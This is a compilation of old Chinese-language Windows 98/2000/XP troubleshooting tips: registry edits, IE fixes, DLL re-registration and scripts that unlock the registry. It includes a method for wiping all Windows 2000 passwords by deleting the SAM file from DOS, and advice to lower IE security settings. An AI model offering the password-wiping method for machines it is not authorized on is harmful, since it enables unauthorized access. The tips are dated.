    重新添加输入法以达到调整顺序的目的，具体方法：在控制面板中找到“输入法”图标双击打开输入法，找到需要调整的输入法，把它前面的输入法依次删除(这里删除并不是真的把输入法从电脑中删除，只是把它清出输入法列表)再按想要的顺序依次地添加上，注意先安装的输入法会排在前面。这样输入法的顺序就得到了调整。(吉林 海浪轻风)

更改系统源文件途径

在开始－运行输入regedit进入注册表，依次展开到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup。更改右边窗口里的Installation Sources、ServicePackSourcePath、SourcePath三个键值为新的途径。

电脑报内容：
1.在Windows98中：点击开始菜单，进入运行对话框，在对话框中输入“regedit”，打开注册表编辑器。打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup主键并选中它，双击右边窗口中的“SourcePath”，在键值中输入需要的路径即可。

    2.在Windows NT/2000/XP中：打开HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Setup主键并选中它，双击右边窗口中的“SourcePath”，在键值中输入需要的路径即可。

关闭WinXP的错误报告

    右键单击“我的电脑”，打开“系统属性”窗口，选择“高级”标签，单击“错误报告”，选择“禁用错误报告”，以后Windows就不会询问你是否要发送报告了，只会告诉你程序出错需要关闭。

快速关闭没有响应的程序
在“开始→运行”框中输入“Regedit”，打开“注册表编辑器”，在HKEY-CURRENT-USER下新建串值Waittokillapptimeout，将其键值设为1000（ms）或更小。

允许强行关机
进入HEKY-USERS\.DEFAULT\Control Panel\desktop，创建一个字符串“AutoEndTask”，将其键值设为“1”即可。

对于真正的死机，一般只能两次按下 “Ctrl+Alt+Del” 组合键或按主机箱上的“Reset”键（因为消耗资源较少，故前者优先）来重新启动了。

系统死机时自动重新启动
进入HKEY_LOCAL_MACHINE\System\CurrentControlSet\C-o-n-trol\CrashControl主键，在右边的窗口中修改“AutoReboot”，将其的键值改为“1”。

黑屏的几个原因

    (1)显示器断电，或显示器数据线接触不良；
    (2)主板没有供电；
    (3)显卡接触不良或损坏；
    (4)CPU 接触不良；
    (5)内存条接触不良；
    (6)机器感染 CIH 病毒，BIOS 被破坏性刷新。

恢复“开始”菜单中的“运行”
    重庆读者飞翔来信：最近不知道执行了什么操作，我的电脑上“开始”菜单里的“运行”选项不见了，能不能帮我找回来啊？

    A：①如果安装的是Win98：打开注册表编辑器，找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”，把右边窗格中的双字节值“NoRun”修改为0或删除，然后注销重新登录即可恢复。②如果安装的是Win2000/XP：在任务栏上点击鼠标右键，选择“属性”，在“开始菜单→自定义→高级”里面可以设定是否出现运行选项。

加快WinXP窗口显示速度

    我们可以通过修改注册表来改变窗口从任务栏弹出，以及最小化回归任务栏的动作，步骤如下：打开注册表编辑器，找到HKEY_ CURRENT_USER\Control Panel\Desktop\ WindowMetrics子键分支，在右边的窗口中找到MinAnimate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。

加快软驱传输速度

    可以通过修改系统注册表以获得较高的数据传输速度。具体方法如下：打开系统注册表编辑器，找到“HEKY_LOCAL_MACHINE\System\CurrentControlset\Services\Class\FCD\000”，在右边的窗口空白处，点击鼠标的右健新建一个“DWORD”值，命名为“Fore-Fifo”，健值设定为“0”。最后关闭注册表编辑器，重新启动电脑，一切就OK了

A盘不见的解决方法

1、先检查硬件，连线是否正确、完好；

2、检查在BIOS中禁用了软盘驱动器，在“Standard CMOS Features”中，发现“Drive A”是否被设置成了“NONE”？

3、“开始”---“运行”---输入“gpedit.msc”运行组策略，在“用户配置---管理模板---Windows组件---资源管理器”右侧窗口中，找到“隐藏‘我的电脑’中这些指定的驱动器”，双击，
在属性框中检查是否将“未配置”设为“已启用”了；
在下拉菜单中是否选择了“仅限制驱动器A和B”；

EXE文件关联丢失的解决方法

1、修改regedit.exe 为 regedit.com
2、HKEY_CLASSES_ROOT\exefile\shell\open\command下的default,键值为"%1" %*。

另外，exe程序关联问题，在注册表下的HKEY_LOCAL_MACHINE\Software\Microsoft\windowsNT\currentVersion\winlogon
下面有个名为shell的子项，键值应为explorer.exe。

IE无法打开二级链接

IE新建窗口模块被破坏所致，需要重新注册几个动态链接文件。

点击：开始---运行---重新注册（输入）以下DLL文件。（一个一个依次注册）
regsvr32 Actxprxy.dll
regsvr32 Shdocvw.dll

重启系统，不行再添加以下的DLL文件。

regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll
regsvr32 Oleaut32.dll
regsvr32 Shell32.dll

另：msjava.dll是JAVA虚拟机的动态连接库，提示找不到模板是因为你的机子没装虚拟机,所以这个文件，你可以不必注册的。

IE浏览器常见经典故障

    当你驾着心爱的IE在Internet上纵横驰骋时，突然桌面上弹出一个莫名其妙的警告提示框，紧接着所有IE窗口全部关闭；或无论如何点击链接，IE始终没有反应……这些故障让人心烦意乱，无可奈何。不过你也不用手足无措，今天我们就一起将IE常见错误揪出来，并彻底消灭！

    1.发送错误报告

    【故障现象】在使用IE浏览网页的过程中，出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时，如果单击“发送错误报告”按钮，则会创建错误报告，单击“关闭”按钮之后会引起当前IE窗口关闭；如果单击“不发送”按钮，则会关闭所有IE窗口。

    【故障点评】这是IE为了解用户在使用中的错误而设计的一个小程序，不过我可不想当微软的“免费测试员”，更何况每天它都会面对成千上万的报告，谁知道有没有在意我的报告问题呢？！

    【故障解决】

    针对不同情况，可分别用以下方法关闭IE发送错误报告功能:

    ①对IE 5.x用户，执行“控制面板→添加或删除程序”，在列表中选择“Internet Explorer Error Reporting”选项，然后单击“更改/删除”按钮，将其从系统中删除。

    ②对Windows 9x/Me/NT/2000下的IE 6.0用户，则可打开“注册表编辑器”，找到[HKEY_LOCAL_MACHINE＼Software ＼Microsoft＼Internet Explorer＼Main]，在右侧窗格创建名为IEWatsonEnabled的DWORD双字节值，并将其赋值为0。

    ③对Windows XP的IE 6.0用户，执行“控制面板→系统”，切换到“高级”选项卡，单击“错误报告”按钮，选中“禁用错误报告”选项，并选中“但在发生严重错误时通知我”，最后单击“确定”按钮。

    2.IE发生内部错误，窗口被关闭

    【故障现象】在使用IE浏览一些网页时，出现错误提示对话框:“该程序执行了非法操作，即将关闭……”，单击“确定”按钮后又弹出一个对话框，提示“发生内部错误……”。单击“确定”按钮后，所有打开的IE窗口都被关闭。

    【故障点评】该错误产生原因多种多样，内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件发生冲突、浏览网站本身含有错误代码……这些情况都有可能，需要耐心加以解决。

    【故障解决】

    ①关闭过多的IE窗口。如果在运行需占大量内存的程序，建议IE窗口打开数不要超过5个。

    ②降低IE安全级别。执行“工具→Internet选项”菜单，选择“安全”选项卡，单击“默认级别”按钮，拖动滑块降低默认的安全级别。

    ③将IE升级到最新版本。IE 6.0下载地址:http://download.sina.com.cn/cgi-bin/detail.cgi?s_id=6041。IE 6.0 SP1下载地址:download.microsoft.com。

    可使用以IE为核心的浏览器，如MyIE2。它占用系统资源相对要少，而且当浏览器发生故障关闭时，下次启动它，会有“是否打开上次发生错误时的页面”的提示，尽可能地帮你挽回损失。下载地址:http://download.sina.com.cn/cgi-bin/detail.cgi?s_id=8012。

    3.出现运行错误

    【故障现象】用IE浏览网页时弹出“出现运行错误，是否纠正错误”对话框，单击“否”按钮后，可以继续上网浏览。

    【故障点评】可能是所浏览网站本身的问题，也可能是由于IE对某些脚本不支持。

    【故障解决】

    ①启动IE，执行“工具→Internet选项”菜单，选择“高级”选项卡，选中“禁止脚本调试”复选框，最后单击“确定”按钮即可。

    ②将IE浏览器升级到最新版本。

    4.IE窗口始终最小化的问题

    【故障现象】每次打开的新窗口都是最小化窗口，即便单击“最大化”按钮后，下次启动IE后新窗口仍旧是最小化的。

    【故障点评】IE具有“自动记忆功能”，它能保存上一次关闭窗口后的状态参数，IE本身没有提供相关设置选项，不过可以借助修改注册表来实现。

    【故障解决】

    ①打开“注册表编辑器”，找到[HKEY_ CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼Desktop＼Old WorkAreas]，然后选中窗口右侧的“OldWorkAreaRects”，将其删除。

    ②同样在“注册表编辑器”中找到[HKEY_CURRENT_USER＼Software ＼Microsoft＼Internet Explorer＼Main]，选择窗口右侧的“Window_Placement”，将其删除。

    ③退出“注册表编辑器”，重启电脑，然后打开IE，将其窗口最大化，并单击“往下还原”按钮将窗口还原，接着再次单击“最大化”按钮，最后关闭IE窗口。以后重新打开IE时，窗口就正常了！

    5.IE无法打开新窗口

    【故障现象】在浏览网页过程中，单击超级链接无任何反应。

    【故障点评】多半是因为IE新建窗口模块被破坏所致。

    【故障解决】单击“开始→运行”，依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”将这两个DLL文件注册，然后重启系统。如果还不行，则可以将mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。

    6.脱机却无法浏览本机上的网页

    【故障现象】通过IE的“脱机浏览”功能，我们差不多能浏览所有已经下载到本地硬盘的网页内容，这对拨号上网的用户来说更是省钱的一大法宝。但有时，目标网页虽然在硬盘上，但是却提示“无法浏览”。

    【故障点评】这多半是由于你修改了系统时间，引起了IE历史记录的错乱。

    【故障解决】

    ①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F，在“包含文字”处输入部分记忆中的关键字，在“搜索”处按“浏览”按钮选择IE临时文件夹的地址，如“C:＼WINDOWS＼Temporary Internet Files”，单击“开始查找”，在结果列表里双击目标页打开。

    ②可以尝试用腾讯的TE等浏览器来脱机浏览。

    7.联网状态下，浏览器无法打开某些站点

    【故障现象】上网后，在浏览某些站点时遇到各种不同的连接错误。

    【故障点评】这种错误一般是由于网站发生故障或者你没有浏览权限所引起。

    【故障解决】针对不同的连接错误，IE会给出不同的错误信息提示，比较常见的有以下几个:

    ①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件，该文件可能根本不存在或者已经被转移到了其他地方。

    ②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下，可以通过在网上即时注册来解决该问题，但有一些完全“封闭”的网站还是不能访问的。

    ③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起，你只有等待对方网页纠正错误后再浏览了:-(。

    小渔收集了一个IE错误代码大全，大家在遇到IE错误提示信息，但是搞不清楚的时候，可以去这里查阅:http://www.cfan.com.cn/09net/19ie.htm。

    8.IE无法重新安装

    【故障现象】IE不能正常使用，在重装时却提示“发现系统中有该版本的IE”而拒绝安装；“添加或删除程序”中又没有卸载选项。

    【故障点评】“重装”是解决IE故障的“终极大法”，也是初级用户的法宝。

    【故障解决】

    ①对IE 5.0的重装可按以下步骤进行:

    第一步:打开“注册表编辑器”，找到[HKEY_LOCAL_ MACHINE＼Software＼Microsoft＼Internet Explorer]，单击其下的Version Vector键。

    第二步:在右侧窗格中双击IE子键，将原来的“5.0002”改为“4.0”，单击“确定”后退出“注册表编辑器”。

    第三步:重启后，就可以重装IE 5.0了。

    ②IE 6.0的重装有两种方法:

    方法1:打开“注册表编辑器”，找到[HKEY_LOCAL_ MACHINE＼SOFTWARE＼Microsoft＼Active Setup＼Installed Components＼{89820200-ECBD-11cf-8B85-00AA005B4383}]，将IsInstalled的DWORD值改为0就可以了。

    方法2:放入Windows XP安装盘，在“开始→运行”窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%＼Inf＼ie.inf”。

IP地址冲突问题的解决方法

    当计算机使用过程中出现“计算机探测到IP地址与您的网卡物理地址发生冲突”的错误时，您就无法使用网络。此时，您可以做如下操作解决问题：

    1 如果您使用的计算机的操作系统是：windows 98

    点击左下角“开始”→“运行”，键入：winipcfg，点击“确定”，在弹出的窗口中，点击“全部释放”，然后点击“全部更新”，即可解决问题。

    如果系统提示无法更新，则需要重新启动计算机。

    2 如果您使用的计算机的操作系统是：windows 2000 或windows XP

    点击左下角“开始”→“运行”，键入：ipconfig /release，点击“确定”，在此点击“开始”→“运行”，键入：ipconfig /renew，点击“确定”，即可解决问题。

解决NTFS下Win2000密码丢失

    第一步，网站下载NTFSDOS Professional软件(下载地址：http://www.winternals.com)，下载后进行安装，安装后执行NTFSDOS Professional Boot Disk Wizard程序，根据向导，会提示依次插入两张软盘，其实能用到的就是第一张。

    第二步，用Win98软盘或光盘启动盘启动机器到DOS状态，然后插入已经做好的NTFSDOS软盘第一张，执行Ntfspro.exe文件，它会开始自动分析当前硬盘分区表，如果有NTFS分区信息，然后就会依次列出每个NTFS分区的盘符(如果此时有机器的报警声响，请不要惊慌，因为此时可能是在你的某个NTFS分区的根目录有中文的目录存在，在DOS中它可能被认为是非法目录)。

    第三步，也就是清除Win2000用户口令。在DOS状态进入WinNT所在的盘符，一般为C区。进入%root%\system32\config目录(%root%指WinNT所在的分区路径)，手动删除SAM文件，这样就可以把Win2000所有用户口令清除了。

    第四步，只需热启动机器，回车就可以正常进入Win2000了。

解开被锁定的.reg与.inf文件

    一、如果注册表编辑器未被锁定，可进入注册表编辑器，手动修改如下键值
    找到[HKEY_LOCAL_MACHINE\Softe\CLASSES\.reg]，将右边窗口中的“默认”字符串的值修改为“REGFILE”；

    找到[HKEY_LOCAL_MACHINE\Software\CLASSES\.inf]，将右边窗口中的“默认”字符串的值修改为“INFFILE”；

    二、如果注册表编辑器已被锁定
    1.用VBS文件解锁：

    打开记事本录入以下内容：

    Dim A

    Set A=CreateObject("WScript.Shell")

    A.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","00000000","REG_DWORD"

    A.RegWrite"HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","regfile"

    A.RegWrite"HKEY_LOCAL_MACHINE\Software\CLASSES\.inf\","inffile"

    输入完成后另存为UNLOCK.VBS，双击执行即可。

    2.用JS文件解锁：

    打开记事本录入以下内容：

    VAR:A=WScript.CreateObject("WScript.Shell")

    A.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","00000000","REG_DWORD");

    A.RegWrite ("HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","regfile");

    A.RegWrite ("HKEY_LOCAL_MACHINE\Software\CLASSES\.inf\","inffile");

    输入完成后另存为UNLOCK.jS，双击执行即可。　(辽宁 乔珊)

    1.在DOS下使用Regedit

    其实DOS下也可以解除这种锁定的。编辑好上面的文件后，点击“开始→程序→MS-DOS方式”，来到MS-DOS方式下，输入regedit c:\unlcok.reg，按回车。接着画面上会出现“您确定要增加c:\unlock.reg信息到注册表”的对话框，按“确定”按钮，unlock.reg的内容就输入注册表了。

    2.利用.htm文件

    打开记事本，输入下面的内容：

    ＜html＞

    ＜body＞

    ＜script language="JavaScript"＞

    var shl=new ActiveXObject("Wscript.shell");

    shl.RegWrite("HKLM\Software\CLASSES\.reg",regfile,"REG_SZ");

    shl.RegWrite("HKLM\Software\CLASSES\.inf",inffile,"REG_SZ");

    ＜/script＞

    ＜/body＞

    ＜/html＞

    保存为.htm文件，运行这个文件就可以解除锁定。

    3.利用超级兔子魔法设置

    运行超级兔子魔法设置，点击“安全与多用户”选项，再点击“安全”标签，将“禁止使用.reg文件”和“禁止使用.inf文件”前面的“√”取消，就可以解除这种锁定。

    4.利用scanreg文件

    在纯DOS下输入scanreg/restore命令，目的是恢复以前备份的注册表，如果你以前备份的注册表是没有锁定的，那么试试这招也很有用的。或者在纯DOS环境下输入命令scanreg，用Tab键选择“START”，进入后选择“View Backups”，即查看备份文件，根据日期选择最新的备份，然后选择RESTORE，这样注册表就可以恢复正常了。

Windows98不能正常关机解决法

    你的Windows98不能正常关闭？老是在你执行了“开始--关闭系统--关闭计算机--确定”后，就停留在关机画面上不动弹了？你只好采取强行关机--“切断电源”？别！朋友，这样会“伤机”的！那到底该怎么办呢？请你别着急，跟我来吧！

一、试试“禁用快速关机”
    大家知道，快速关机是Windows98中的新增功能，它可以大大减少关机的时间。但是，该功能与某些硬件不兼容，如果计算机中安装了这些硬件，可能会导致计算机停止响应，使你的Windows98不能正常关闭。那么我们就禁用快速关机：
    1.点击“开始--运行”，在“打开”框中键入“msconfig”，然后单击“确定”；
    2.点击“高级”，选中“禁用快速关机”复选框，点击“确定”，然后再次“确定”；
    3.这时系统将提示重新启动计算机，请重新启动你的计算机；
    4.重新启动计算机后再次关闭计算机，等候关机。如果计算机能够正常关机，则快速关机功能可能与计算机上所安装的多个硬件设备不兼容，你可以与计算机上所安装设备的供应商联系。

二、检查AMP（高级电源管理）功能
    1.点击“开始--设置--控制面板”，然后双击“系统”；
    2.在“设备管理器”选项卡上，双击“系统设备”；
    3.双击设备列表中的“高级电源管理”，再点击“设置”选项卡，然后清除“启用电源管理”复选框；
    4.点击“确定”；
    5.重启动计算机；
    6.关闭计算机，如果计算机正常关机，则问题可能在于APM。请关闭“高级电源管理”功能。

三、退出Windows声音文件
    1.点击“开始--设置--控制面板--声音”；
    2.在“事件”框中，点击“退出 Windows”；
    3.在“名称”中，选中（无）；
    4.单击“确定”；
    5.关闭计算机。
    此时如果你的Windows98能够正常关闭，则问题是由退出声音文件所引起的。要解决这一问题，你可以从备份中恢复声音文件或重新安装提供声音文件的程序，也可以将Windows98配置为不播放“退出Windows”声音文件即可。

四、检查“启动”文件夹
    通过检查“启动”文件夹来确定“启动”文件夹中的程序是否与启动过程冲突：
    1.点击“开始--运行”；
    2.在“打开”框中，键入“msconfig”，然后单击“确定”；
    3.选中“装载启动组项目”复选框；
    4.点击“确定”；
    5.此时系统将提示重新启动计算机时，请“确定”。
    如果计算机无法正常启动或关闭，则问题可能在于从“启动”文件夹中所加载的程序，将其清除即可。

五、检查Config.sys和Autoexec.bat文件
    1.点击“开始--运行”， 在“打开”框中，键入“msconfig”，然后单击“确定”；
    2.选择“诊断启动”项；
    3.点击“确定”。
    此时系统将提示重新启动计算机，请点击“确定”。如果计算机的启动或关闭不正确，那么就请你按下面方法来确定问题是由Config.sys还是Autoexec.bat文件中的哪一行所引起的冲突故障：
    重新启动计算机，启动时，按住Ctrl键，从“Startup”菜单中选择“SafeMode”；
    点击“开始--运行”；
    在“打开”框中，键入“msconfig”，然后单击“确定”；
    点击清除Config.sys和Autoexec.bat选项卡中不含Windows图标行的复选框，使用此Config.sys文件，点击启用某行；
    点击“确定”，重新启动计算机。如果计算机的启动和关闭都很正常，启用另一行，并重复步骤4、5的爱作。
    就这样逐步启用Config.sys文件和Autoexec.bat文件中的行，直到发现问题为止。哪行有问题就对症下药地处理那一行！

六、检查内部系统问题
    1.点击“开始--运行”；
    2.在“打开”框中，键入“msconfig”，然后点击“确定”；
    3.再点击“高级”，清除“高级疑难解答设置”中的“禁用系统ROM中断点”、“禁用虚拟HDIRQ”和“EMM不包含A000_FFFF”复选框，然后点击“确定”；
    4.重新启动你的计算机。
    此时如果你的计算机正常启动，请重复以上步骤，然后在步骤3中选中某一复选框。重复此过程，直到发现计算机无法正常启动为止。

七、检查System.ini文件或Win.ini文件
    1.点击“开始--运行”；
    2.在“打开”框中，键入“msconfig”，然后单击“确定”；
    3.在“常规”选项卡中，清除“选择性启动”中的所有复选框，选中“处理System.ini文件”复选框，再选中“处理Win.ini文件”复选框；
    4.点击“确定”；
    5.重新启动你的计算机。
    此时如果计算机无法正常启动或关闭，则表明你的System.ini或Win.ini文件中的条目存在问题。请你仔细检查每一条目，以确定原因。确定引发问题的条目之后，请删除此条目或在此条目前加上（；）禁用此条目或修改此条目即可解决此问题。
八、查看Bootlog.txt文件
    请用文本编辑器“记事本”，检查Bootlog.txt文件中的Terminate=条目。这些条目位于文件的结尾，可为问题的起因提供一定的线索。如果Bootlog.txt文件的最后一行为：EndTerminate=Kernel，你的Windows98就可以成功的关闭。如果Bootlog.txt文件的最后一行为下列某项条目，请检查所列出的可能原因：

    Terminate=QueryDrivers 说明内存管理程序有问题。
    Terminate=UnloadNetwork 说明与Config.sys中的实模式网络驱动程序冲突。
    Terminate=ResetDisplay 说明需要更新视频驱动程序。
    Terminate=RIT 说明声卡或鼠标驱动程序与计时器方面有问题。
    Terminate=Win32 说明与32位程序有关的问题阻塞了线程。

九、检查Logos.sys文件
    Logos.sys是图像文件，作用是显示提示“现在可以安全地关闭计算机了”。如果该文件损坏，则关机时将不出现上述的提示信息。解决方法是将logos.sys文件删除，然后从别的Windows98系统中拷贝该文件到Windows子目录下即可。

十、检查硬件
    检查计算机的硬件配置，可以使用设备管理按下述步骤进行。
    进入“控制面板”，双击“系统”图标。 在“设备管理”标签下，使下列分支下的所有设备无效：

    显卡
    软盘驱动器控制器
    硬盘驱动器控制器
    键盘
    鼠标
    网卡
    PCMCIA插槽
    端口

SCSI控制器可以采用下列步骤使设备管理器中的某个设备无效：
    1.双击包含你想选定的设备，单击该设备，然后单击属性；
    2. 在“常规”标签下，选定“在此硬件配置文件中禁用”复选框，然后单击“确定”；
    3.重新引导你的系统。
    如果问题解决，逐个启用刚才禁用的设备，并检查有没有设备冲突。
按下列顺序逐个启用设备：
    COM端口
    硬盘控制器
    软盘控制器
    其它设备
启用禁用的设备，并检查有没有设备冲突可按下述步骤进行：
    1.在设备管理器中双击包含你想选定的设备，单击该设备，然后单击属性；
    2.在“常规”标签下启用禁用的设备；
    3.在“资源”标签下检查“冲突的设备列表”的内容。注意，并非所有设备都有“资源”标签。 单击“确定”；
    4.重新启动系统。
    如果问题仍然没有解决，可以单击“开始--程序--附件--系统工具--系统信息”，然后单击“工具”菜单，单击“自动跳过驱动程序代理”工具以启用所有被禁用设备的驱动程序。
    如果通过上述步骤，确定了是某一硬件引起的非正常关机问题，应该与该设备的代理商联系，以更新驱动程序或固件（firmware，指更新升级flash ROM的内容）。
    其实Windows 98系统非正常关机的故障并不可怕，只要我们认真对待，通过以上几种方法，基本上能够解决你的Windows98不能正常关闭的问题。

五招解决WinXP启动后操作迟延的问题

症状：启动刚进入系统界面时，点什么都打不开，要等一分钟左右才能打开

症状：启动刚进入系统界面时，点什么都打不开，要等一分钟左右才能打开。
    解决办法：
    一、首先，请升级杀毒软件的病毒库，全面杀毒，以排除病毒原因。什么？你没安杀毒软件!？--除非你是老鸟(此文大虾和老鸟跳过^_^)，否则建议安装。What?盗版的，不能升级!？这个问题别问偶，自己想办法!

    二、开始→运行，输入msconfig→确定。在打开的系统系统配置程序里，将一些不重要的服务以及启动程序关闭，重启电脑。

    三、进入“我的电脑”--工具--文件夹选项--查看--取消“自动搜索网络文件夹和打印机”的勾选。

    四、在Windows XP启动进入桌面后系统会暂时停滞一段时间，这时启动任何程序都会没有反应，这是因为Windows XP的DHCP Client服务正在为网卡分配IP地址，系统会暂时停滞一段时间。解决这个问题，只要在“控制面板→网络连接”里，用鼠标右键单击“本地连接”图标，然后选择属性，在弹出的属性窗口(如图)的“常规”选项卡的列表里选择“Internet协议(TCP/IP)”一项，然后单击“属性”按钮。在弹出的属性窗口中，选择“使用下面的IP地址”选项，并在“IP地址”和“子网掩码”中分别输入“192.168.0.1”和“255.255.255.0”，最后单击OK退出设置窗口。

    开始→设置→网络连接→右击“本地连接”→属性→双击“Internet 协议 (TCP/IP)”→如果IP地址为空的话，点“使用下面的IP地址”指定IP地址和子网掩码。如可以将IP地址设为192.168.0.X(X为1-255之间任一值)，子网掩码可设为255.255.255.0→确定→确定。

    五、清除预取目录，进入C:\WINDOWS\Prefetch文件夹，将扩展名为pf的文件全部删除，重启

Win XP系统搜索故障以及处理办法点点通

    故障1：单击资源管理器工具栏上的“搜索”按钮或者按F3，系统无任何响应。

    解决方法：首先进入C:\Windows\inf文件夹(该文件夹属性为隐藏)，右键单击srchasst.inf文件，选择“安装”菜单，系统会提示你插入Windows XP安装光盘，该操作为重新安装Windows XP的搜索服务组件。对于在搜索中遇到的其它故障，大家也可以将该方法作为最后的救命稻草。

    故障2：系统提示“A file that is required to run Search Companion cannot be found. You may need to run setup”(找不到搜索组件)。

    解决方法：造成这个故障的原因是C:\Windows\srchasst\mui\0409下的BAR.XSL、BALLOON.XSL等文件损坏，我们可以首先尝试清空IE临时文件夹，如果问题还未得到解决请安装http://download.microsoft.com/download/whistler/Patch/Q319949/

     WXP/EN-US/Q319949_WXP_SP1_x86_ENU.exe(英文版Windows XP用户)，如果你尚未安装SP1，请安装。

    故障3：系统提示一个黄色带感叹号的三角形警告。

    解决方法：首先运行“Regedit”命令打开注册表编辑器，依次定位到“[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0 -5564-11d1-83f2-00a0c90dc849}]”分支，在右边窗口中找到“默认”，将其值修改为“Search Results Folder”。接下来定位到“[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Cabinet State]”，在窗口右边新建一个字符串键，其名为“Search Asst”，讲其值设置为“no”。

    故障4：“开始”菜单中的“搜索”菜单丢失。

    解决方法：运行“Regedit”命令打开注册表编辑器，定位到“[HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]，在窗口右边新建一个名为“NoFind”的dword值，将其值设置为00000000(十六进制)。

XP输入法状态条不见了

打开注册表编辑器，找到“HKEY_USERS\.DEFAULT\Control Panel\Input Method”分支，将右边窗口中“Show Status”的键值修改成“1”(“1”为显示状态条，“0”为不显示状态条)，然后重新启动系统，输入法状态条就出来了。此方法对Win 98/2000都适用。
打开“我的电脑→控制面板→区域和语言选项”，在“语言”标签页下的“详细信息”中，点击“设置”标签页下的“语言栏设置”按钮，选择“在桌面显示语言栏”后点击“确定”即可。

我的电脑-控制面板-区域和语言选项-语言－详细信息－高级，把关闭高级文字服务前面的钩去掉。

Windows XP搜索功能失效
    问：我的电脑安装的是Windows XP系统，最近它的文件搜索功能不能用了，打开搜索界面时，输入文件或文件夹名的文本框是灰色的，无法输入。请问该怎么解决？

    答：打开注册表编辑器，定位到[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]，新建字符串值“Use Search Asst”，设值为“no”。查看C:\Windows\System32\下的Shell32.dll文件语言版本，中文(0804)、英文(0600)等，将C:\Windows\Srchasst\mui\下原为0804或0409等的目录名改为与Shell32.dll语言版本相同的数字。现在打开搜索助理，是不是可以用了？

解决不定时搜寻软驱问题

    如果Windows 98/Me 常常会有事没事就去检查软驱，可以从下面几个方面依顺序来检查，排除问题。以下越在前面的方法，可能性越大。
    ·清除开始菜单中，「文档」里的资料，如果你曾经开启过软盘上的文件，而这文件名称还存在于「文档」里的话，Windows 有可能会去搜寻软驱。
    ·清除开始菜单中，「运行」里的项目。
    ·到「设置」>>「控制面板」，打开「系统」，到「性能」这页，按「文件系统」，到「磁盘」，不要勾「每次开机就搜寻新的软驱」，按确定，当你重新启动计算机之后，Windows 就不会去侦测你的软驱。
    ·检查一下是不是你的防毒软件会去检查软驱（例如 McAfee 、Antivirus 、Pccillin..等），请查阅你的防毒软件说明。
    ·检查一下是不是你计算机上的一些工具软件会去检查你的软驱。
    ·检查 MSDOS.SYS 这个文件里面（你必须知道如何修改文件属性，才能修改 MSDOS.SYS 的内容），有没有 LocalLoadHigh=1 这一行叙述，有的话，删掉。
    ·检查一下是不是病毒的关系，造成系统不定时去搜寻软驱（例如 NEUVILLE 病毒）。
    ·检查 registry：HKEY_CLASSES_ROOT/CLSID 的值，看看有没有任何的路径是指向到软盘上的。

部分软件无法安装
    问：最近我的Windows 2000系统在安装一部分软件时出现了问题，总是刚开始安装一会儿之后就出现如下提示：“安装程序启动安装引擎失败：不支持此接口”，重装系统后仍然出现这个问题，请问如何解决？

    答：有的软件安装需要Windows Installer支持，一般解决方法为：点击“开始→程序→管理工具→服务”，找到Windows Installer服务，将属性打开，将启动类型改为手动，然后启动即可。记住在安装好程序后将此服务停止。如果仍然存在问题，请到微软站点下载最新的Windows Installer 2.0版。如果问题仍然存在，按如下步骤检查：①是否具有管理员的权限。②安装文件是单线程的，查看正在运行的进程，如果里面有ikernel.exe，则表示现在无法安装，结束此进程，然后再安装就OK了。③删除Program Files\Common Files\InstallShield\Engine文件夹，然后重新运行安装程序。


解决插电即开机问题

《一键清理系统垃圾》

解决插电即开机问题

    现象：有些朋友有关机后断开电源板电源的习惯，可是却常常被一个问题困扰，就是电源板一通电，计算机就自动开机了，Power键形同虚设。

    解决：有些主板在BIOS设置的“Power Management Setup”中，有一个选项 “Pwron After PW-Fail”，它的默认设置为“ON”，将它设置为“OFF”，下一次再通电时就不会自动开机了。如果没有这个选项，可以把电源管理中的ACPI功能关闭之后再次打开，如果本来就是关闭的，打开它即可。

    大多数主板在BIOS中有一个选项：即在POWER MANAGEMENT SETUP(电源管理设置)中可以选择在意外断电后重新来电时机器的状态，是自动开机或是保持关机状态还是保持断电前的状态。请把自动开机设为Off。

此外，电源或主板质量不佳也可能导致类似问题出现。ATX主板的启动需要检测一个电容的电平信号。如果在接通电源的时候不能保证一次接通良好，就会产生一个瞬间的冲击电流，可能使电源误认为是开机信号，从而导致误开机。

解决窗口按钮上乱码问题

    问：我有一台电脑，操作系统是Win98第二版，现在不知是什么原因，窗口上的最小化、最大化和关闭按钮，还有菜单上的向下或向右的箭头全都成了乱码，我想问一下到底是哪个文件出了问题？

